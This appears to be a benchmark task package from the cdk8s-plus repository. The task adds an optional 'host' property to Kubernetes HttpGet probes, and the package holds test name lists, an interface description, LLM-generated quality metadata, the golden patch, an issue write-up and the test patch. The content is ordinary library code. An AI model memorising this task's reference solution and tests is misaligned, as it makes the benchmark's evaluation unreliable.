[ "fromCommand", "fromHttpGet", "fromTcpSocket", "can grant permissions on imported", "defaults", "custom", "can be imported", "can be bounded to a volume at instantiation", "can be bounded to a volume post instantiation", "no-ops if bounded twice to the same volume", "throws if bounded twice to different volumes", "defaultChild", "default configuration", "custom configuration", "Can be isolated", "can select namespaces", "can select all namespaces", "minimal", "with data", "with binaryData", "with binaryData and data", "\"binaryData\" and \"data\" cannot share keys", "addData()/addBinaryDataq() can be used to add data", "addData() and addBinaryData() throw if key already used", "addFile() adds local files to the config map", "metadata is synthesized", "can configure an immutable config map", "sub-directories are skipped", "keys are based on file names", "\"prefix\" can be used to prefix keys\"", "\"exclude\" exclusion via globs", "default child", "a label selector is automatically allocated", "no selector is generated if \"select\" is false", "can select by label", "targets a deployment that has containers with volume mounts", "creates HPA with 2 default scaleUp policies and 1 default scaleDown policy, when all other scaleUp and scaleDown options are provided", "creates HPA with scaleUp and scaleDown policies with the default 15 second periodSeconds, when policies are provided without duration option", "creates HPA with two different scaling strategies, when provided a scaleUp strategy of Max and scaleDown strategy of Min", "creates HPA with CPU ContainerResource metric, when provided a Metric.containerCpu()", "creates HPA with Memory ContainerResource metric, when provided a Metric.containerMemory()", "creates HPA with Storage ContainerResource metric, when provided a Metric.containerStorage()", "creates HPA with Ephemeral Storage ContainerResource metric, when provided a Metric.containerStorage()", "creates HPA with external metric, when provided a 
Metric.external()", "creates HPA with object metric, when provided a Metric.object()", "creates HPA with pods metric, when provided a Metric.pods()", "creates HPA with Resource CPU metric, when provided a Metric.resourceCpu()", "creates HPA with Resource Memory metric, when provided a Metric.resourceMemory()", "creates HPA with Resource Storage metric, when provided a Metric.resourceStorage()", "creates HPA with Resource Ephemeral Storage metric, when provided a Metric.resourceEphemeralStorage()", "creates HPA with Resource CPU metric targeting 70% average utilization, when provided a MetricTarget.averageUtilization()", "creates HPA with Resource CPU metric targeting 47.2 average value, when provided a MetricTarget.averageUtilization()", "creates HPA with Resource CPU metric targeting the exact value of 29.5, when provided a MetricTarget.value()", "creates HPA, when target is a deployment", "creates HPA, when target is a StatefulSet", "creates HPA, when minReplicas is same as maxReplicas", "creates HPA with expected spec, when metrics, scaleUp, and scaleDown are all configured", "creates HPA, when metrics are not provided and one of the two target containers does not have any resources limits/requests", "throws error at synth, when metrics are not provided and target container does not have resource constraints specified", "throws error, when minReplicas is more than maxReplicas", "throws error, when scaleUp.stabilizationWindow is more than 1 hour", "throws error, when scaleDown.stabilizationWindow is more than 1 hour", "throws error, when scaleUp.stabilizationWindow is -1", "throws error, when scaleDown.stabilizationWindow is -1 seconds", "throws error, when scaleUp policy has a duration longer than 30 minutes", "throws error, when scaleDown policy has a duration longer than 30 minutes", "throws error, when scaleUp policy has a duration set to 0", "throws error, when scaleDown policy has a duration set to 0", "throws error, when scaleUp policy has a duration set 
to -10 minutes", "throws error, when scaleDown policy has a duration set to -10 minutes", "throws error at synth, when Deployment target has replicas defined", "throws error at synth, when StatefulSet target has replicas defined", "A label selector is automatically allocated", "No selector is generated if \"select\" is false", "Can select by label", "StatefulSet gets defaults", "StatefulSet allows overrides", "Synthesizes spec lazily", "default update strategy", "custom update strategy", "minimal definition", "with a custom resource rule", "can be allowed read access to a pod and secret", "can be allowed read access to a mix of resources", "giving access to a single pod and all pods still gives access to all pods", "can be allowed read access to all pods and secrets in a namespace", "can be allowed read access to a custom resource type", "can be allowed access to a specific resource and a resource type", "with a custom non-resource rule", "can be allowed read access to all pods and secrets in the cluster", "can be allowed access to a specific resource, a resource type, and non resource endpoints", "can be aggregated", "custom aggregation labels can be added", "Allows setting all options", "Applies default restart policy to pod spec", "Does not modify existing restart policy of pod spec", "role can bind to imported", "secrets can be added to the service account", "auto mounting token can be disabled", "IngressClassName can be set", "fromResource", "if the service exposes a port, it will be used by the ingress", "fails if the service does not expose a port", "fails if a port is explicitly specified, and the service is exposed through a different port", "service exposes a single port and its the same as the backend", "service exposes multiple ports and the backend uses one of them", "fails if backend does not specify port and service exposes multiple ports", "service exposes multiple ports and backend uses a different one", "addHostDefaultBackend()", "addHostRule()", 
"addRule()", "define rules upon initialization", "fails if path does not begin with \"/\"", "fails if no rules or default backend are specified", "addTls()", "define tls upon initialization", "defaultBackend property", "addDefaultBackend()", "using addDefaultBackend()", "defaultBackend and rules", "two rules for the same path (no host)", "two rules for the same path and host", "Can be exposed as via ingress", "Expose uses the correct default values", "Expose can set service and port details", "Cannot be exposed if there are no containers in spec", "default deployment strategy", "custom deployment strategy", "rolling update deployment strategy with a custom maxSurge and maxUnavailable", "throws is maxSurge and maxUnavailable is set to zero for rolling update", "PercentOrAbsoulte zero", "default minReadySeconds", "default progressDeadlineSeconds", "can configure minReadySeconds", "can configure progressDeadlineSeconds", "throws if minReadySeconds > progressDeadlineSeconds", "throws if minReadySeconds = progressDeadlineSeconds", "can select with expressions", "exposing via a service preserves deployment namespace", "expose captures all container ports", "cannot expose with a port not owned by the container", "expose via service with multiple ports throws error when names are not provided", "can tolerate tainted nodes", "can be assigned to a node by name", "can be attracted to a node by selector - default", "can be attracted to a node by selector - custom", "can be co-located with a managed deployment - default", "can be co-located with a managed deployment - custom", "can be co-located with an unmanaged deployment - default", "can be co-located with an unmanaged deployment - custom", "can be spread - default", "can be spread - custom", "spread set to true", "can be separated from a managed deployment - default", "can be separated from a managed deployment - custom", "can be separated from an unmanaged deployment - default", "can be separated from an unmanaged 
deployment - custom", "Can mutate metadata", "Can add only resource requests", "Can add only resource limits", "Can add only limits and requests on memory", "Can add only limits and requests on cpu", "Can add only limits and requests on emphemeral-storage", "Can add only limits on emphemeral-storage", "default security context", "custom security context", "can configure a postStart lifecycle hook", "can configure a preStop lifecycle hook", "Can be created from value", "Can be created from config map name", "Can be created from secret value", "Can be created from ISecret.envValue", "Can be created from new secret.envValue", "Cannot be created from missing required process env", "Can be created from missing optional process env", "Can be created from existing process env", "Can be created from fieldRef", "Can be created from fieldRef with key", "Can not be created from fieldRef without key", "Can be created from resourceFieldRef", "Can be created from resourceFieldRef with divisor", "Can be created from resourceFieldRef with container", "cannot configure identical ports and protocols at instantiation", "can configure identical ports with different protocols at instantiation", "cannot add an already existing port number with identical protocol", "can add an already existing port number with a different protocol", "cannot add an already existing port name", "can configure multiple ports", "portNumber is equivalent to port", "Instantiation properties are all respected", "Must use container props", "Can add environment variable", "can add environment variables from a source", "can add environment variables from a secret", "Can mount container to volume", "can mount container to a pv", "mount options", "mount from ctor", "\"startupProbe\" property has defaults if port is provided", "\"startupProbe\" property is undefined if port is not provided", "\"readiness\", \"liveness\", and \"startup\" can be used to define probes", "Can add resource limits and requests", "can 
create a RoleBinding from a Role", "can create a RoleBinding from a ClusterRole", "can call bindInNamespace multiple times", "can create a ClusterRoleBinding from a ClusterRole", "can bind a ServiceAccount to a role", "can add subjects to a RoleBinding after creating it", "volume name is trimmed if needed", "custom volume name", "default mode", "optional", "items", "items are sorted by key for deterministic synthesis", "items are sorted by key for determinstic synthesis", "default medium", "memory medium", "size limit", "can be reserved with default storage class", "can be reserved with a custom storage class", "reserved claim is created in the same namespace as the volume", "throws if reserved twice", "can be bound to a claim at instantiation", "can be bound to a claim post instantiation", "no-ops if bounded twice to the same claim", "throws if bounded twice to different claims", "ipv4", "throws on invalid ipv4 cidr", "ipv6", "throws on invalid ipv6 cidr", "anyIpv4", "anyIpv6", "tcp", "tcpRange", "allTcp", "udp", "udpRange", "allUcp", "of", "can create a policy for a managed pod", "can create a policy for a managed workload resource", "can create a policy for selected pods", "can create a policy for all pods", "can create a policy that allows all ingress by default", "can create a policy that denies all ingress by default", "can create a policy that allows all egress by default", "can create a policy that denies all egress by default", "cannot create a policy for a selector that selects pods in multiple namespaces", "cannot create a policy for a selector that selects pods in namespaces based on labels", "policy namespace defaults to selector namespace", "can add ingress from an ip block", "can add ingress from a managed pod", "can add ingress from a managed workload resource", "can add ingress from pods selected without namespaces", "can add ingress from pods selected with namespaces selected by labes", "can add ingress from pods selected with namespaces selected 
by names", "can add ingress from all pods", "can add ingress from managed namespace", "can add ingress from selected namespaces", "can add ingress from all namespaces", "can add egress to an ip block", "can add egress to a managed pod", "can add egress to a managed workload resource", "can add egress to pods selected without namespaces", "can add egress to pods selected with namespaces selected by labes", "can add egress to pods selected with namespaces selected by names", "can add egress to all pods", "can add egress to managed namespace", "can add egress to selected namespaces", "can add egress to all namespaces", "Can be imported from secret name", "Can create a new secret", "Can add data to new secrets", "Can create a basic auth secret", "can override the name of a basic auth secret", "Can create an ssh auth secret", "can override the name of an ssh auth secret", "Can create a service account token secret", "can override the name of a service account token secret", "can add annotations to a service account token secret", "Can create a TLS secret", "can override the name of a tls secret", "Can create a Docker config secret", "can override the name of a DockerConfig secret", "default immutability", "can configure an immutable generic secret", "can configure an immutable basic auth secret", "can configure an immutable ssh auth secret", "can configure an immutable service account token secret", "can configure an immutable tls secret", "can configure an immutable docker config secret", "Must be configured with at least one port", "Can provide cluster IP", "can select a deployment", "Can serve by port", "Must set externalIPs if provided", "Must be configured with externalName if type is EXTERNAL_NAME", "Type defaults to EXTERNAL_NAME if externalName if given", "Can restrict CIDR IP addresses for a LoadBalancer type", "can be exposed by an ingress", "fails with two volumes with the same name", "fails adding a volume with the same name", "fails with a container that 
has mounts with different volumes of the same name", "can configure multiple mounts with the same volume", "Can add container post instantiation", "Can attach an existing container post instantiation", "Must have at least one container", "Can add volume post instantiation", "Automatically adds volumes from container mounts", "init containers cannot have liveness probe", "init containers cannot have readiness probe", "init containers cannot have startup probe", "can specify init containers at instantiation", "can add init container post instantiation", "init container names are indexed", "automatically adds volumes from init container mounts", "custom host aliases", "default dns settings", "custom dns settings", "throws if more than 3 nameservers are configured", "throws if more than 6 search domains are configured", "throws if no nameservers are given when dns policy is set to NONE", "can configure auth to docker registry", "auto mounting token defaults to true", "can select pods", "can pass an existing secret as the docker auth", "can add hostNetwork to pod", "pod hostNetwork is not added by default", "default termination grace period", "custom termination grace period", "custom termination grace period - minutes", "only NO_EXECUTE taint queries can specify eviction", "can be co-located with a managed pod - default", "can be co-located with a managed pod - custom", "can be co-located with an unmanaged pod - default", "can be co-located with an unmanaged pod - custom", "can be separated from a managed pod - default", "can be separated from a managed pod - custom", "can be separated from an unmanaged pod - default", "can be separated from an unmanaged pod - custom", "can allow to ip block", "can isolate pod", "can allow to managed pod", "can allow to managed workload resource", "can allow to pods selected without namespaces", "can allow to pods selected with namespaces selected by names", "cannot allow to pods selected with namespaces selected by labels", "cannot 
allow to pods selected in all namespaces", "can allow to all pods", "can allow to managed namespace", "can allow to namespaces selected by name", "cannot allow to namespaces selected by labels", "can allow to peer across namespaces", "can allow to multiple peers", "cannot allow to the same peer twice", "allow to create an ingress policy in source namespace when peer doesnt define namespaces", "allow to with peer isolation creates only ingress policy on peer", "allow to with pod isolation creates only egress policy on pod", "allow to defaults to peer container ports", "can allow from ip block", "can allow from managed pod", "can allow from managed workload resource", "can allow from pods selected without namespaces", "can allow from pods selected with namespaces selected by names", "cannot allow from pods selected with namespaces selected by labels", "cannot allow from pods selected in all namespaces", "can allow from all pods", "can allow from managed namespace", "can allow from namespaces selected by name", "cannot allow from namespaces selected by labels", "can allow from peer across namespaces", "can allow from multiple peers", "cannot allow from the same peer twice", "allow from create an ingress policy in source namespace when peer doesnt define namespaces", "allow from with peer isolation creates only ingress policy on peer", "allow from with pod isolation creates only egress policy on pod", "allow from defaults to peer container ports", "can grant read permissions to a user", "can grant read permissions to a group", "can grant read permissions to a service account", "can grant read permissions to another pod", "can grant read permissions to workload", "can grant read permissions twice with different subjects", "cannot grant permissions twice with same subject" ]
Method: Action.fromHttpGet(container: Container, path: string, options: { port?: number; scheme?: ConnectionScheme; host?: string } = {}): k8s.HttpGetAction Location: src/_action.ts Inputs: - **container** – the Container whose port information may be used as a default. - **path** – HTTP request path. - **options** – optional object; may include **port** (number), **scheme** (ConnectionScheme, default HTTP), and new **host** (string) to specify the target hostname/IP for the probe. Outputs: Returns a Kubernetes `HttpGetAction` object with fields `path`, `port`, `scheme`, and the newly added `host` when provided. If `host` is omitted, the field is omitted, allowing the pod IP to be used. Description: Generates a low‑level `HttpGetAction` for a probe, now supporting an explicit `host` override to control the destination address. Interface: HttpGetProbeOptions Location: src/probe.ts Inputs: - **port**?: number – port number for the probe (optional). - **scheme**?: ConnectionScheme – HTTP or HTTPS (default HTTP). - **host**?: string – new optional property specifying the hostname or IP the probe should contact; defaults to the pod IP when omitted. Outputs: N/A (used as a configuration object for creating probes). Description: Options object accepted by `Probe.fromHttpGet`; extended to allow callers (including tests) to set a specific host for the HTTP GET probe.
Apache-2.0
{ "base_image_name": "node_16", "install": [ "npm install" ], "log_parser": "parse_log_js_4", "test_cmd": "npx jest --verbose --no-colors --testLocationInResults" }
{ "num_modified_files": 2, "num_modified_lines": 14, "pr_author": "cdk8s-automation", "pr_labels": [ "auto-approve: Pull requests that should be auto approved" ], "llm_metadata": { "code": "A", "code_quality": null, "confidence": 0.85, "detected_issues": { "B1": false, "B2": false, "B3": false, "B4": false, "B5": false, "B6": false }, "detected_issues_explanation": null, "detecte d_issues": null, "difficulty": "easy", "external_urls": [ "https://github.com/cdk8s-team/cdk8s-plus/pull/3818", "https://github.com/sqren/backport" ], "intent_completeness": "partial", "patch": null, "pr_categories": [ "core_feat" ], "reason": null, "reasoning": "The issue requests adding a `host` property to HttpGet probes, and the test patch expects this property to appear in the probe configuration. The golden patch implements exactly that by extending the method signature and returning the host value, matching the test expectations. The tests align with the intended behavior, and there are no signs of unrelated coupling, missing external info, or ambiguous requirements beyond the brief description. 
Hence the task is solvable and high‑quality.", "suggested_fixes": null, "test_alignment": null, "test_alignment_issues": [], "test_alignment_quick_tree": null, "test_alignment_quick_tree_bootstrap": null, "test_alignment_quick_tree_mocks": null, "test_alignment_quick_tree_params": null, "test_alignment_quick_tree_unrelated": null, "test_alignment_quick_tree_use_hook": null, "test_alignment_quick_tree_use_hook_unrelated": null, "test_alignment_sample_without_replacement": null, "test_alignment_test_alignment_sample_without_replacement": null, "test_build_phylogeny": null, "test_build_phylogeny_unrelated": null, "test_build_phylogeny_use_hook": null, "test_build_phylogeny_use_hook_unrelated": null, "test_core_seq_test_sample_motif_length_1": null, "test_core_seq_test_sample_motif_length_3": null, "test_core_seq_test_sample_without_replacement": null, "test_core_sequence": null, "test_core_sequence_test_sample_motif_length_1": null, "test_core_sequence_test_sample_motif_length_3": null, "test_core_sequence_test_sample_without_replacement": null, "test_sample_motif_length_1": null, "test_sample_motif_length_3": null, "test_sample_without_replacement": null } }
0195aef826ef55ed3cdd35db549beced7c625261
2024-04-18 07:16:11
cdk8s-team__cdk8s-plus-4043
diff --git a/src/_action.ts b/src/_action.ts index a1c7bc6c..40bb8d88 100644 --- a/src/_action.ts +++ b/src/_action.ts @@ -21,11 +21,16 @@ export class Action { return { command }; } - public static fromHttpGet(container: Container, path: string, options: { port?: number; scheme?: ConnectionScheme } = { }): k8s.HttpGetAction { + public static fromHttpGet(container: Container, path: string, options: { + port?: number; + scheme?: ConnectionScheme; + host?: string; + } = {}): k8s.HttpGetAction { return { path, port: k8s.IntOrString.fromNumber(options.port ?? container.portNumber ?? 80), scheme: options.scheme ?? ConnectionScheme.HTTP, + host: options.host, }; } -} \ No newline at end of file +} diff --git a/src/probe.ts b/src/probe.ts index e10fc8e8..048e619c 100644 --- a/src/probe.ts +++ b/src/probe.ts @@ -85,6 +85,13 @@ export interface HttpGetProbeOptions extends ProbeOptions { * @default ConnectionScheme.HTTP */ readonly scheme?: ConnectionScheme; + + /** + * The host name to connect to on the container. + * + * @default - defaults to the pod IP + */ + readonly host?: string; } /**
feat(probe): add `host` property to HttpGet probes (#3818) # Backport This will backport the following commits from `k8s-29/main` to `k8s-28/main`: - [feat(probe): add `host` property to HttpGet probes (#3818)](https://github.com/cdk8s-team/cdk8s-plus/pull/3818) <!--- Backport version: 8.5.0 --> ### Questions ? Please refer to the [Backport tool documentation](https://github.com/sqren/backport)
**Title** Add host support to HTTP GET probes **Problem** HTTP readiness and liveness probes could only target the pod IP, making it impossible to direct probes to a specific hostname. Users needed a way to specify a custom host for HTTP GET probes. **Root Cause** The probe abstraction and its underlying HTTP GET action did not expose a `host` field, so the generated Kubernetes manifest always omitted it. **Fix / Expected Behavior** - Introduce an optional `host` property in the probe options interface. - Propagate the provided `host` value to the corresponding HTTP GET action. - When `host` is omitted, retain the existing behavior of using the pod IP. - Update type definitions and documentation to describe the new property. - Ensure existing code paths continue to compile and function without changes. **Risk & Validation** - Verify that omitting `host` yields identical manifests to prior versions. - Add or update tests to cover scenarios with and without the `host` option. - Run full type‑checking and integration test suite to confirm no regressions.
4,043
cdk8s-team/cdk8s-plus
diff --git a/test/probe.test.ts b/test/probe.test.ts index 17946ea5..8040b027 100644 --- a/test/probe.test.ts +++ b/test/probe.test.ts @@ -57,6 +57,7 @@ describe('fromHttpGet()', () => { periodSeconds: Duration.seconds(5), successThreshold: 3, timeoutSeconds: Duration.minutes(2), + host: '1.1.1.1', }); // THEN @@ -65,6 +66,7 @@ describe('fromHttpGet()', () => { path: '/hello', port: k8s.IntOrString.fromNumber(5555), scheme: 'HTTP', + host: '1.1.1.1', }, failureThreshold: 11, initialDelaySeconds: 60,
[ "defaults to the container port", "specific port", "options", "minimal usage", "specific port and hostname" ]
[ "fromCommand", "fromHttpGet", "fromTcpSocket", "can grant permissions on imported", "defaultChild", "Can be imported from secret name", "Can create a new secret", "Can add data to new secrets", "Can create a basic auth secret", "can override the name of a basic auth secret", "Can create an ssh auth secret", "can override the name of an ssh auth secret", "Can create a service account token secret", "can override the name of a service account token secret", "can add annotations to a service account token secret", "Can create a TLS secret", "can override the name of a tls secret", "Can create a Docker config secret", "can override the name of a DockerConfig secret", "default immutability", "can configure an immutable generic secret", "can configure an immutable basic auth secret", "can configure an immutable ssh auth secret", "can configure an immutable service account token secret", "can configure an immutable tls secret", "can configure an immutable docker config secret", "minimal definition", "volume name is trimmed if needed", "custom volume name", "default mode", "optional", "items", "items are sorted by key for deterministic synthesis", "items are sorted by key for determinstic synthesis", "default medium", "memory medium", "size limit", "defaults", "custom", "default child", "a label selector is automatically allocated", "no selector is generated if \"select\" is false", "can select by label", "Can be isolated", "role can bind to imported", "secrets can be added to the service account", "auto mounting token can be disabled", "can be imported", "can be bounded to a volume at instantiation", "can be bounded to a volume post instantiation", "no-ops if bounded twice to the same volume", "throws if bounded twice to different volumes", "Allows setting all options", "Applies default restart policy to pod spec", "Does not modify existing restart policy of pod spec", "Synthesizes spec lazily", "IngressClassName can be set", "fromResource", "if the service exposes a 
port, it will be used by the ingress", "fails if the service does not expose a port", "fails if a port is explicitly specified, and the service is exposed through a different port", "service exposes a single port and its the same as the backend", "service exposes multiple ports and the backend uses one of them", "fails if backend does not specify port and service exposes multiple ports", "service exposes multiple ports and backend uses a different one", "addHostDefaultBackend()", "addHostRule()", "addRule()", "define rules upon initialization", "fails if path does not begin with \"/\"", "fails if no rules or default backend are specified", "addTls()", "define tls upon initialization", "defaultBackend property", "addDefaultBackend()", "using addDefaultBackend()", "defaultBackend and rules", "two rules for the same path (no host)", "two rules for the same path and host", "can be reserved with default storage class", "can be reserved with a custom storage class", "reserved claim is created in the same namespace as the volume", "throws if reserved twice", "can be bound to a claim at instantiation", "can be bound to a claim post instantiation", "no-ops if bounded twice to the same claim", "throws if bounded twice to different claims", "can select namespaces", "can select all namespaces", "A label selector is automatically allocated", "No selector is generated if \"select\" is false", "Can select by label", "StatefulSet gets defaults", "StatefulSet allows overrides", "default update strategy", "custom update strategy", "Can be exposed as via ingress", "Expose uses the correct default values", "Expose can set service and port details", "Cannot be exposed if there are no containers in spec", "default deployment strategy", "custom deployment strategy", "rolling update deployment strategy with a custom maxSurge and maxUnavailable", "throws is maxSurge and maxUnavailable is set to zero for rolling update", "PercentOrAbsoulte zero", "default minReadySeconds", "default 
progressDeadlineSeconds", "can configure minReadySeconds", "can configure progressDeadlineSeconds", "throws if minReadySeconds > progressDeadlineSeconds", "throws if minReadySeconds = progressDeadlineSeconds", "can select with expressions", "exposing via a service preserves deployment namespace", "expose captures all container ports", "cannot expose with a port not owned by the container", "expose via service with multiple ports throws error when names are not provided", "can tolerate tainted nodes", "can be assigned to a node by name", "can be attracted to a node by selector - default", "can be attracted to a node by selector - custom", "can be co-located with a managed deployment - default", "can be co-located with a managed deployment - custom", "can be co-located with an unmanaged deployment - default", "can be co-located with an unmanaged deployment - custom", "can be spread - default", "can be spread - custom", "spread set to true", "can be separated from a managed deployment - default", "can be separated from a managed deployment - custom", "can be separated from an unmanaged deployment - default", "can be separated from an unmanaged deployment - custom", "Can add only resource requests", "Can add only resource limits", "Can add only limits and requests on memory", "Can add only limits and requests on cpu", "Can add only limits and requests on emphemeral-storage", "Can add only limits on emphemeral-storage", "default security context", "custom security context", "can configure a postStart lifecycle hook", "can configure a preStop lifecycle hook", "Can be created from value", "Can be created from config map name", "Can be created from secret value", "Can be created from ISecret.envValue", "Can be created from new secret.envValue", "Cannot be created from missing required process env", "Can be created from missing optional process env", "Can be created from existing process env", "Can be created from fieldRef", "Can be created from fieldRef with key", "Can not 
be created from fieldRef without key", "Can be created from resourceFieldRef", "Can be created from resourceFieldRef with divisor", "Can be created from resourceFieldRef with container", "cannot configure identical ports and protocols at instantiation", "can configure identical ports with different protocols at instantiation", "cannot add an already existing port number with identical protocol", "can add an already existing port number with a different protocol", "cannot add an already existing port name", "can configure multiple ports", "portNumber is equivalent to port", "Instantiation properties are all respected", "Must use container props", "Can add environment variable", "can add environment variables from a source", "can add environment variables from a secret", "Can mount container to volume", "can mount container to a pv", "mount options", "mount from ctor", "\"startupProbe\" property has defaults if port is provided", "\"startupProbe\" property is undefined if port is not provided", "\"readiness\", \"liveness\", and \"startup\" can be used to define probes", "Can add resource limits and requests", "with a custom resource rule", "can be allowed read access to a pod and secret", "can be allowed read access to a mix of resources", "giving access to a single pod and all pods still gives access to all pods", "can be allowed read access to all pods and secrets in a namespace", "can be allowed read access to a custom resource type", "can be allowed access to a specific resource and a resource type", "with a custom non-resource rule", "can be allowed read access to all pods and secrets in the cluster", "can be allowed access to a specific resource, a resource type, and non resource endpoints", "can be aggregated", "custom aggregation labels can be added", "minimal", "with data", "with binaryData", "with binaryData and data", "\"binaryData\" and \"data\" cannot share keys", "addData()/addBinaryDataq() can be used to add data", "addData() and addBinaryData() throw 
if key already used", "addFile() adds local files to the config map", "metadata is synthesized", "can configure an immutable config map", "sub-directories are skipped", "keys are based on file names", "\"prefix\" can be used to prefix keys\"", "\"exclude\" exclusion via globs", "targets a deployment that has containers with volume mounts", "default configuration", "creates HPA with 2 default scaleUp policies and 1 default scaleDown policy, when all other scaleUp and scaleDown options are provided", "creates HPA with scaleUp and scaleDown policies with the default 15 second periodSeconds, when policies are provided without duration option", "creates HPA with two different scaling strategies, when provided a scaleUp strategy of Max and scaleDown strategy of Min", "creates HPA with CPU ContainerResource metric, when provided a Metric.containerCpu()", "creates HPA with Memory ContainerResource metric, when provided a Metric.containerMemory()", "creates HPA with Storage ContainerResource metric, when provided a Metric.containerStorage()", "creates HPA with Ephemeral Storage ContainerResource metric, when provided a Metric.containerStorage()", "creates HPA with external metric, when provided a Metric.external()", "creates HPA with object metric, when provided a Metric.object()", "creates HPA with pods metric, when provided a Metric.pods()", "creates HPA with Resource CPU metric, when provided a Metric.resourceCpu()", "creates HPA with Resource Memory metric, when provided a Metric.resourceMemory()", "creates HPA with Resource Storage metric, when provided a Metric.resourceStorage()", "creates HPA with Resource Ephemeral Storage metric, when provided a Metric.resourceEphemeralStorage()", "creates HPA with Resource CPU metric targeting 70% average utilization, when provided a MetricTarget.averageUtilization()", "creates HPA with Resource CPU metric targeting 47.2 average value, when provided a MetricTarget.averageUtilization()", "creates HPA with Resource CPU metric 
targeting the exact value of 29.5, when provided a MetricTarget.value()", "creates HPA, when target is a deployment", "creates HPA, when target is a StatefulSet", "creates HPA, when minReplicas is same as maxReplicas", "creates HPA with expected spec, when metrics, scaleUp, and scaleDown are all configured", "creates HPA, when metrics are not provided and one of the two target containers does not have any resources limits/requests", "throws error at synth, when metrics are not provided and target container does not have resource constraints specified", "throws error, when minReplicas is more than maxReplicas", "throws error, when scaleUp.stabilizationWindow is more than 1 hour", "throws error, when scaleDown.stabilizationWindow is more than 1 hour", "throws error, when scaleUp.stabilizationWindow is -1", "throws error, when scaleDown.stabilizationWindow is -1 seconds", "throws error, when scaleUp policy has a duration longer than 30 minutes", "throws error, when scaleDown policy has a duration longer than 30 minutes", "throws error, when scaleUp policy has a duration set to 0", "throws error, when scaleDown policy has a duration set to 0", "throws error, when scaleUp policy has a duration set to -10 minutes", "throws error, when scaleDown policy has a duration set to -10 minutes", "throws error at synth, when Deployment target has replicas defined", "throws error at synth, when StatefulSet target has replicas defined", "Can mutate metadata", "custom configuration", "ipv4", "throws on invalid ipv4 cidr", "ipv6", "throws on invalid ipv6 cidr", "anyIpv4", "anyIpv6", "tcp", "tcpRange", "allTcp", "udp", "udpRange", "allUcp", "of", "can create a policy for a managed pod", "can create a policy for a managed workload resource", "can create a policy for selected pods", "can create a policy for all pods", "can create a policy that allows all ingress by default", "can create a policy that denies all ingress by default", "can create a policy that allows all egress by default", 
"can create a policy that denies all egress by default", "cannot create a policy for a selector that selects pods in multiple namespaces", "cannot create a policy for a selector that selects pods in namespaces based on labels", "policy namespace defaults to selector namespace", "can add ingress from an ip block", "can add ingress from a managed pod", "can add ingress from a managed workload resource", "can add ingress from pods selected without namespaces", "can add ingress from pods selected with namespaces selected by labes", "can add ingress from pods selected with namespaces selected by names", "can add ingress from all pods", "can add ingress from managed namespace", "can add ingress from selected namespaces", "can add ingress from all namespaces", "can add egress to an ip block", "can add egress to a managed pod", "can add egress to a managed workload resource", "can add egress to pods selected without namespaces", "can add egress to pods selected with namespaces selected by labes", "can add egress to pods selected with namespaces selected by names", "can add egress to all pods", "can add egress to managed namespace", "can add egress to selected namespaces", "can add egress to all namespaces", "fails with two volumes with the same name", "fails adding a volume with the same name", "fails with a container that has mounts with different volumes of the same name", "can configure multiple mounts with the same volume", "Can add container post instantiation", "Can attach an existing container post instantiation", "Must have at least one container", "Can add volume post instantiation", "Automatically adds volumes from container mounts", "init containers cannot have liveness probe", "init containers cannot have readiness probe", "init containers cannot have startup probe", "can specify init containers at instantiation", "can add init container post instantiation", "init container names are indexed", "automatically adds volumes from init container mounts", "custom 
host aliases", "default dns settings", "custom dns settings", "throws if more than 3 nameservers are configured", "throws if more than 6 search domains are configured", "throws if no nameservers are given when dns policy is set to NONE", "can configure auth to docker registry", "auto mounting token defaults to true", "can select pods", "can pass an existing secret as the docker auth", "can add hostNetwork to pod", "pod hostNetwork is not added by default", "default termination grace period", "custom termination grace period", "custom termination grace period - minutes", "only NO_EXECUTE taint queries can specify eviction", "can be co-located with a managed pod - default", "can be co-located with a managed pod - custom", "can be co-located with an unmanaged pod - default", "can be co-located with an unmanaged pod - custom", "can be separated from a managed pod - default", "can be separated from a managed pod - custom", "can be separated from an unmanaged pod - default", "can be separated from an unmanaged pod - custom", "can allow to ip block", "can isolate pod", "can allow to managed pod", "can allow to managed workload resource", "can allow to pods selected without namespaces", "can allow to pods selected with namespaces selected by names", "cannot allow to pods selected with namespaces selected by labels", "cannot allow to pods selected in all namespaces", "can allow to all pods", "can allow to managed namespace", "can allow to namespaces selected by name", "cannot allow to namespaces selected by labels", "can allow to peer across namespaces", "can allow to multiple peers", "cannot allow to the same peer twice", "allow to create an ingress policy in source namespace when peer doesnt define namespaces", "allow to with peer isolation creates only ingress policy on peer", "allow to with pod isolation creates only egress policy on pod", "allow to defaults to peer container ports", "can allow from ip block", "can allow from managed pod", "can allow from managed 
workload resource", "can allow from pods selected without namespaces", "can allow from pods selected with namespaces selected by names", "cannot allow from pods selected with namespaces selected by labels", "cannot allow from pods selected in all namespaces", "can allow from all pods", "can allow from managed namespace", "can allow from namespaces selected by name", "cannot allow from namespaces selected by labels", "can allow from peer across namespaces", "can allow from multiple peers", "cannot allow from the same peer twice", "allow from create an ingress policy in source namespace when peer doesnt define namespaces", "allow from with peer isolation creates only ingress policy on peer", "allow from with pod isolation creates only egress policy on pod", "allow from defaults to peer container ports", "can grant read permissions to a user", "can grant read permissions to a group", "can grant read permissions to a service account", "can grant read permissions to another pod", "can grant read permissions to workload", "can grant read permissions twice with different subjects", "cannot grant permissions twice with same subject", "Must be configured with at least one port", "Can provide cluster IP", "can select a deployment", "Can serve by port", "Must set externalIPs if provided", "Must be configured with externalName if type is EXTERNAL_NAME", "Type defaults to EXTERNAL_NAME if externalName if given", "Can restrict CIDR IP addresses for a LoadBalancer type", "can be exposed by an ingress", "can create a RoleBinding from a Role", "can create a RoleBinding from a ClusterRole", "can call bindInNamespace multiple times", "can create a ClusterRoleBinding from a ClusterRole", "can bind a ServiceAccount to a role", "can add subjects to a RoleBinding after creating it" ]
